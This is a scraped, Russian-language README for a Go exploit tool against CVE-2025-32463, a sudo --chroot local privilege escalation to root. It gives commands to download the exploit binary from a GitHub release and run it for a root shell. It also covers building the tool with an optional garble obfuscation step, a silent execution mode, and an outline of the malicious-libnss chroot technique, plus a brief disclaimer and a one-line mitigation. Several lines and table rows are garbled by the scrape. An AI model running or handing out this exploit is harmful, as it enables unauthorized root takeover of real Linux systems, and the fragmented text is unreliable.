
Эта CVE описывает уязвимость в версиях sudo с 1.9.14 по 1.9.17, позволяющую несанкционированное локальное повышение привилегий до доступа root.
Этот репозиторий предоставляет инструмент эксплойта на Go для CVE-2025-32463, критической уязвимости локального повышения привилегий (CVSS 9.3) в sudo версиях 1.9.14–1.9.17. Она позволяет неавторизованным локальным пользователям получить root-доступ, эксплуатируя ошибку в опции --chroot (-R).
⚠️ Предупреждение: Только для образовательных и тестовых целей. Используйте в изолированных средах (например, ВМ). Не для злонамеренного использования.
--chrootcurl -L https://github.com/Nowafen/CVE-2025-32463/releases/download/exploit/exploit -o exploit
chmod +x exploit
./exploit --execution # Запускает root-шелл
git clone https://github.com/Nowafen/CVE-2025-32463.git
cd CVE-2025-32463
go build -o exploit # Или используйте garble для обфускации
./exploit --execution
| Команда | Описание |
|---|---|
./exploit --help | Показать справку по использованию |
./exploit --about |
Проверка: В root-шелле выполните id (должен показать uid=0(root)) или whoami (должен показать root).
/tmp/sudowoot.stage.*woot1337.c) для root-шеллаlibnss_/woot1337.so.2)sudo -R woot woot для загрузки библиотеки и повышения привилегийDefaults !use_chroot в /etc/sudoersЭтот инструмент предназначен для исследований в области безопасности. Автор не несёт ответственности за неправомерное использование. Всегда тестируйте ответственно.
Создано MNM
| Показать сведения о CVE |
./exploit --execution | Запустить эксплойт (открывает root-шелл) |
./exploit --execution --silent | Выполнение в тихом режиме |